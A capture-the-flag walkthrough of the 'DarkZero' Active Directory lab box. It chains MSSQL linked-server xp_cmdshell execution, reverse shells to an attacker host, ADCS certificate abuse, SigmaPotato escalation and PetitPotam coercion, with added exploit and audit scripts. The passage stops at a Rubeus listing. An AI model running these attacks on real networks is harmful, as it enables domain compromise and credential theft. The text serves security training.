
Reconnaissance
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-18 20:30:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-18T20:30:16
|_Not valid after: 2055-11-18T20:30:16
| ms-sql-ntlm-info:
| 10.129.219.186:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-11-18T20:32:23+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.219.186:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49893/tcp open msrpc Microsoft Windows RPC
49918/tcp open msrpc Microsoft Windows RPC
60501/tcp open msrpc Microsoft Windows RPC
60517/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2025-11-18T20:31:45
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Most of the ports are what you would expect from a Domain Controller, but MSSQL on 1433 stands out. The nmap scan already reveals the domain darkzero.htb and the hostname DC01, so both go into my /etc/hosts file. One more detail worth noting for later: the host clock is about seven hours ahead of my scanner (clock-skew: 6h59m59s). Kerberos tolerates only five minutes of skew, so every Kerberos-based tool in this writeup is wrapped in faketime -f +7h.
Initial Access
As is common in real-life pentests, you start the DarkZero box with credentials for the following account:
john.w:RFulUtONCOL!
Privilege Escalation
The provided credentials get me into MSSQL on DC01 only as guest, but enum_links reveals a linked server, DC02.darkzero.ext, whose login mapping connects darkzero\john.w to the fixed remote login dc01_sql_svc instead of passing my own identity through (Is Self Mapping = 0). After switching to the link with use_link and enumerating the logins there, dc01_sql_svc turns out to be a sysadmin on DC02, so enabling xp_cmdshell and spawning a reverse shell is one command away. This is the classic linked-server misconfiguration: a low-privileged local login borrows a high-privileged remote login, and the link has RPC Out enabled, so arbitrary statements can be executed on the remote instance.
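The T-SQL behind the helper commands used below, as an added example that is not code from the page or from impacket: enum_links runs sp_linkedservers and sp_helplinkedsrvlogin, use_link wraps every statement in EXEC ('...') AT [link] (doubling the quotes once per hop), and enable_xp_cmdshell runs sp_configure on the remote side. The script also audits the login mappings for the pattern found here. The host, link name, credentials and command are placeholders, the sample mapping rows are constructed from the page's output, and the impacket driver is written against tds.MSSQL's connect/login/sql_query/printRows as used by mssqlclient.py in impacket 0.12/0.13 (check against your installed version).

```python
"""Linked-server enumeration and remote execution with raw T-SQL (added example)."""

# What `enum_links` runs: the configured links and their login mappings.
ENUM_LINKS = "EXEC sp_linkedservers"
ENUM_LINK_LOGINS = "EXEC sp_helplinkedsrvlogin"
# What `enable_xp_cmdshell` runs on the (remote) instance.
ENABLE_XP_CMDSHELL = (
    "EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
)


def at_link(tsql, chain):
    """Wrap `tsql` so it runs on the last server in `chain` through RPC Out.

    EXEC ('...') AT [link] takes the statement as a string literal, so every
    single quote is doubled once per hop; `use_link` does the same internally.
    chain = ["DC02.darkzero.ext"] is one hop; a longer list chains links.
    """
    for link in reversed(chain):
        tsql = "EXEC ('" + tsql.replace("'", "''") + "') AT [" + link + "]"
    return tsql


def risky_mappings(mapping_rows, local_sysadmins):
    """Audit sp_helplinkedsrvlogin rows (keys named as the procedure returns them).

    A mapping is risky when a fixed remote login is lent to a local login that
    is not sysadmin here, or to every login (Local Login = NULL). Self-mapping
    rows pass the caller's own identity through and are not flagged; rows with
    no remote login connect without credentials and lend nothing.
    """
    flagged = []
    for row in mapping_rows:
        if row["Is Self Mapping"] or row["Remote Login"] is None:
            continue
        if row["Local Login"] is None or row["Local Login"] not in local_sysadmins:
            flagged.append((row["Linked Server"], row["Local Login"], row["Remote Login"]))
    return flagged


# Constructed sample: the mapping the page found on DC01, plus a harmless
# self-mapping row for contrast.
SAMPLE_MAPPINGS = [
    {"Linked Server": "DC02.darkzero.ext", "Local Login": "darkzero\\john.w",
     "Is Self Mapping": 0, "Remote Login": "dc01_sql_svc"},
    {"Linked Server": "DC01", "Local Login": None,
     "Is Self Mapping": 1, "Remote Login": None},
]


def exploit(host, domain, user, password, chain, command):
    """Drive the same flow with impacket's TDS client (needs network; not run here).

    Assumption: tds.MSSQL(host, port).connect(), .login(db, user, pw, domain,
    hashes, windows_auth), .sql_query(q) -> rows and .printRows() behave as in
    impacket 0.12/0.13's mssqlclient.py.
    """
    from impacket import tds  # lazy import: the helpers above need no impacket

    sql = tds.MSSQL(host, 1433)
    sql.connect()
    if not sql.login("master", user, password, domain, None, True):  # Windows auth
        sql.printReplies()
        raise SystemExit("login failed")
    for row in sql.sql_query(ENUM_LINK_LOGINS):
        print(row)
    # Who are we on the remote side, and are we sysadmin there?
    print(sql.sql_query(at_link(
        "SELECT SYSTEM_USER AS who, IS_SRVROLEMEMBER('sysadmin') AS sa", chain)))
    sql.sql_query(at_link(ENABLE_XP_CMDSHELL, chain))
    sql.sql_query(at_link(
        "EXEC master..xp_cmdshell '" + command.replace("'", "''") + "'", chain))
    sql.printRows()
    sql.disconnect()


if __name__ == "__main__":
    print(at_link(ENABLE_XP_CMDSHELL, ["DC02.darkzero.ext"]))
    print(risky_mappings(SAMPLE_MAPPINGS, {"sa"}))
    # exploit("dc01.darkzero.htb", "DARKZERO.HTB", "john.w", "RFulUtONCOL!",
    #         ["DC02.darkzero.ext"], "whoami")
```

The audit function is the defender's side of the same finding: run sp_helplinkedsrvlogin on every instance and compare the local logins against sys.server_principals membership in sysadmin; any non-self-mapping row that lends a remote login to a non-sysadmin (or to NULL, i.e. everyone) is the hole exploited here.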
$ impacket-mssqlclient -windows-auth DARKZERO.HTB/john.w:'RFulUtONCOL!'@dc01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
darkzero-ext\Domain Admins WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT Service\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
dc01_sql_svc SQL_LOGIN 0 1 0 0 0 0 0 0 0
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell powershell -e JABjAGw<SNIP>
SYSTEM on DC02
After upgrading my shell to a sliver session I start enumerating. The shell runs as svc_sql, and that user has no interesting privileges enabled in its current token. According to the Policy_Backup.inf found in the root of the C drive it should have, when logged on differently: svc_sql is explicitly granted SeServiceLogonRight, and SeImpersonatePrivilege is assigned to the SERVICE SID (S-1-5-6), which only ends up in a token created by a service logon (logon type 5).
cat Policy_Backup.inf
--- SNIP ---
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9
SeMachineAccountPrivilege = *S-1-5-11
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeSystemtimePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549
SeAuditPrivilege = *S-1-5-19,*S-1-5-20
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544,*S-1-5-90-0
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550
SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0,*S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9
SeSecurityPrivilege = *S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-32-544,*S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
SeManageVolumePrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeIncreaseWorkingSetPrivilege = *S-1-5-32-545
SeTimeZonePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreateSymbolicLinkPrivilege = *S-1-5-32-544
SeDelegateSessionUserImpersonatePrivilege = *S-1-5-32-544
--- SNIP ---
The goal is therefore to get the password of svc_sql and use it to start a new session with logon type 5 (service logon), which gives the token the SERVICE SID and with it SeImpersonatePrivilege. I cannot read the password from the current session, but I can request a certificate for svc_sql from within it and authenticate with that instead. First I run Certify with find to list the available CAs and templates, then I request a certificate with the User template, which allows Client Authentication and can be enrolled by Domain Users.
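The reasoning behind the choice of logon type, worked through in code as an added example (not the page's own): the script parses the [Privilege Rights] lines of the Policy_Backup.inf shown above and computes, per logon type, whether svc_sql may log on that way at all and which privileges its token then holds. The excerpt keeps every line of the listing that names a SID an ordinary domain user or its logon session can carry, plus two admin-only lines for contrast. The group SIDs assumed for an ordinary domain user (Everyone, Authenticated Users, BUILTIN\Users) are an assumption about the box.

```python
"""Effective privileges per logon type from a secedit [Privilege Rights] section."""
import re

# Excerpt constructed from the page's Policy_Backup.inf listing.
POLICY_INF = """\
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9
SeMachineAccountPrivilege = *S-1-5-11
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554
SeDebugPrivilege = *S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeIncreaseWorkingSetPrivilege = *S-1-5-32-545
"""

# Well-known logon SID that each logon type adds to the token, and the user
# right that must permit that logon type in the first place.
LOGON_TYPES = {
    2: ("S-1-5-4", "SeInteractiveLogonRight"),  # Interactive
    3: ("S-1-5-2", "SeNetworkLogonRight"),      # Network
    4: ("S-1-5-3", "SeBatchLogonRight"),        # Batch
    5: ("S-1-5-6", "SeServiceLogonRight"),      # Service
}

# Groups an ordinary domain user is assumed to carry (assumption about the box):
# Everyone, Authenticated Users, BUILTIN\Users.
BASE_GROUPS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}


def parse_privilege_rights(text):
    """Return {right_name: {principal, ...}} for the [Privilege Rights] section.

    secedit writes SIDs with a leading '*'; bare entries are account names.
    """
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        rights[name.strip()] = {p.strip().lstrip("*") for p in value.split(",") if p.strip()}
    return rights


def token_principals(account, logon_type, groups=BASE_GROUPS):
    """Identities a token for `account` holds after a logon of `logon_type`."""
    logon_sid, _ = LOGON_TYPES[logon_type]
    return set(groups) | {account, logon_sid}


def logon_allowed(rights, principals, logon_type):
    """The logon must be granted by its Se*LogonRight and not hit a SeDeny* right."""
    _, allow_right = LOGON_TYPES[logon_type]
    deny_right = allow_right.replace("Se", "SeDeny", 1)
    if principals & rights.get(deny_right, set()):
        return False
    return bool(principals & rights.get(allow_right, set()))


def effective_privileges(rights, principals):
    """Privileges (as opposed to logon rights) assigned to any identity in the token."""
    return {name for name, who in rights.items()
            if name.endswith("Privilege") and principals & who}


if __name__ == "__main__":
    rights = parse_privilege_rights(POLICY_INF)
    for lt, label in ((3, "network"), (2, "interactive"), (5, "service")):
        who = token_principals("svc_sql", lt)
        print(label, "logon allowed:", logon_allowed(rights, who, lt),
              "privileges:", sorted(effective_privileges(rights, who)))
```

For a service logon the result is exactly the five privileges getprivs shows later in the type-5 shell (SeMachineAccount, SeChangeNotify, SeImpersonate, SeCreateGlobal, SeIncreaseWorkingSet); a network logon yields the same minus the two granted to SERVICE, and an interactive logon is not permitted to svc_sql at all, which is why RunasCs is told to use logon type 5 rather than 2.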
sliver (darkzero) > certify -- find
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=darkzero,DC=ext'
[*] Listing info about the Enterprise CA 'darkzero-ext-DC02-CA'
Enterprise CA Name : darkzero-ext-DC02-CA
DNS Hostname : DC02.darkzero.ext
FullName : DC02.darkzero.ext\darkzero-ext-DC02-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=darkzero-ext-DC02-CA, DC=darkzero, DC=ext
Cert Thumbprint : 56B26E2CB5DD40283F32A80A07D637782F557F95
Cert Serial : 1643389103EC9DA6407DCE3E015ECD07
Cert Start Date : 7/29/2025 7:17:46 AM
Cert End Date : 7/29/2035 7:27:43 AM
Cert Chain : CN=darkzero-ext-DC02-CA,DC=darkzero,DC=ext
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
Allow ManageCA, ManageCertificates darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : DC02.darkzero.ext\darkzero-ext-DC02-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Domain Users S-1-5-21-1969715525-31638512-2552845157-513
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
Object Control Permissions
Owner : darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteOwner Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteDacl Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteProperty Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
--- SNIP ---
sliver (darkzero) > certify -- request /ca:DC02\\darkzero-ext-DC02-CA /template:User
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : darkzero-ext\svc_sql
[*] No subject name specified, using current context as subject.
[*] Template : User
[*] Subject : CN=svc_sql, CN=Users, DC=darkzero, DC=ext
[*] Certificate Authority : DC02\darkzero-ext-DC02-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
<SNIP>
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
To reach DC02 with tools from my own machine, I start chisel with chisel client 10.10.10.10:1337 R:socks in my sliver session to open a SOCKS proxy. After converting the PEM output into a PFX file, I can authenticate with it through the proxy using certipy-ad. The certificate carries the UPN and the SID security extension in its SAN, so PKINIT succeeds, and certipy conveniently also retrieves the NT hash of the account. With that hash I can set the password to a known value with impacket-changepasswd.
$ proxychains -q faketime -f +7h certipy-ad auth -pfx cert.pfx -dc-ip 127.0.0.1
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'svc_sql@darkzero.ext'
[*] Security Extension SID: 'S-1-5-21-1969715525-31638512-2552845157-1103'
[*] Using principal: 'svc_sql@darkzero.ext'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'svc_sql.ccache'
[*] Wrote credential cache to 'svc_sql.ccache'
[*] Trying to retrieve NT hash for 'svc_sql'
[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f
$ proxychains -q impacket-changepasswd -hashes :816ccb849956b531db139346751db65f \
-newpass 'Helloworld123!' \
DARKZERO.EXT/svc_sql@dc02.darkzero.ext
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of DARKZERO.EXT\svc_sql
[*] Connecting to DCE/RPC as DARKZERO.EXT\svc_sql
[*] Password was changed successfully.
By executing RunasCs with the new credentials for svc_sql and specifying logon type 5 (service logon) I get another reverse shell as that user, this time from a token created by a service logon.
sliver (darkzero) > execute-assembly -t 15 -- RunasCs.exe svc_sql Helloworld123! -l 5 --bypass-uac powershell -r 10.10.10.10:4444
[*] Output:
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-612be$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1900 created in background.
This time getprivs shows SeImpersonatePrivilege enabled (the five privileges listed are exactly the ones the policy assigns to Everyone, Authenticated Users, Users and SERVICE), so I can proceed with a potato-style escalation. With SigmaPotato I create a new user and add it to the Administrators group. Through the SOCKS proxy I authenticate as that user and get a new shell with high privileges, before I upgrade this to a SYSTEM shell with SigmaPotato.
sliver (darkzero) > getprivs
Privilege Information for svchost.exe (PID: 3692)
-------------------------------------------------
Process Integrity Level: High
Name Description Attributes
==== =========== ==========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled, Enabled by Default
SeImpersonatePrivilege Impersonate a client after authentication Enabled, Enabled by Default
SeCreateGlobalPrivilege Create global objects Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (darkzero) > execute-assembly -t 15 -- SigmaPotato.exe '"net user /add ryuki Helloworld123!"'
sliver (darkzero) > execute-assembly -t 15 -- SigmaPotato.exe '"net localgroup administrators ryuki /add"'
Administrator on DC01
With SYSTEM privileges on DC02 I can dump every Kerberos ticket cached on the system. DC02 is a domain controller, and domain controllers are trusted for unconstrained delegation by default: whenever a principal authenticates to DC02 with a forwardable TGT, its Kerberos client sends a forwarded copy of that TGT along with the AP-REQ and LSASS on DC02 caches it. So if I can coerce DC01 into authenticating to DC02, DC01$'s TGT will be cached there as well, if only for a short time (the trust between the two forests evidently still permits TGT delegation, which Microsoft turned off by default across forest trusts in 2019). Through nxc and the credentials of john.w I trigger PetitPotam with DC02 as the listener, and the tool reports success.
$ nxc smb dc01.darkzero.htb -u john.w \
-p 'RFulUtONCOL!' \
-M coerce_plus \
-o METHOD=PetitPotam LISTENER=dc02.darkzero.ext
SMB 10.129.1.21 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.1.21 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
COERCE_PLUS 10.129.1.21 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.1.21 445 DC01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
Running rubeus triage on DC02 lists a krbtgt/DARKZERO.HTB ticket for DC01$ @ DARKZERO.HTB under its own logon session (LUID 0x1730ca), and I can proceed to dump it via rubeus dump. Note the difference from the krbtgt/DARKZERO.HTB ticket held by dc02$: that one is the inter-realm referral TGT DC02 uses for the trust, whereas the DC01$ ticket is a TGT whose client belongs to the other forest, and the forwarded flag in the dump confirms it was delivered by delegation.
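Picking that ticket out of a long triage listing, as an added example that is not code from the page or from Rubeus: the parser below reads the triage table and flags TGTs whose client realm is not the host's own, which on an unconstrained-delegation host is exactly the delegation catch, while leaving the host's own inter-realm TGTs alone. The sample rows are copied from the page's triage output, and the flags line is the one from the dump.

```python
"""Spot delegated foreign TGTs in a Rubeus triage listing (added example)."""
import re

# Constructed sample: four rows from the page's `rubeus triage` table.
TRIAGE_SAMPLE = """\
| 0x1730ca | DC01$ @ DARKZERO.HTB | krbtgt/DARKZERO.HTB | 11/18/2025 11:50:38 PM |
| 0x73b81 | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:56:35 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | krbtgt/DARKZERO.HTB | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | ldap/dc01.darkzero.htb/darkzero.htb | 11/18/2025 11:51:41 PM |
"""

# | LUID | UserName @ Realm | Service | EndTime |
ROW = re.compile(
    r"^\|\s*(0x[0-9a-f]+)\s*\|\s*(\S+)\s*@\s*(\S+)\s*\|\s*(\S+)\s*\|\s*(.*?)\s*\|$", re.I)


def parse_triage(text):
    """Turn the triage table into dicts; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            luid, user, realm, service, end = m.groups()
            rows.append({"luid": luid, "user": user, "realm": realm,
                         "service": service, "end": end})
    return rows


def foreign_tgts(rows, local_realm):
    """TGTs whose *client* is from another realm: the delegation catch.

    A krbtgt/OTHER ticket held by a local principal (dc02$ here) is just the
    inter-realm referral TGT for the trust, so the test is on the client's
    realm, not on the realm in the service name.
    """
    local = local_realm.upper()
    return [r for r in rows
            if r["service"].upper().startswith("KRBTGT/")
            and r["realm"].upper() != local]


def is_forwarded(flags_line):
    """From `rubeus dump`: a TGT delivered by delegation carries the 'forwarded' flag."""
    flags = {f.strip().lower() for f in flags_line.split(":", 1)[-1].split(",")}
    return "forwarded" in flags


if __name__ == "__main__":
    for t in foreign_tgts(parse_triage(TRIAGE_SAMPLE), "DARKZERO.EXT"):
        print(f"delegated TGT: {t['user']}@{t['realm']} in LUID {t['luid']}")
    print(is_forwarded(
        "Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable"))
```

The same two checks (foreign client realm on a krbtgt ticket, forwarded flag) are what a defender would alert on when a LSASS ticket listing is taken from a host that is trusted for unconstrained delegation.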
sliver (darkzero) > rubeus -- triage
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
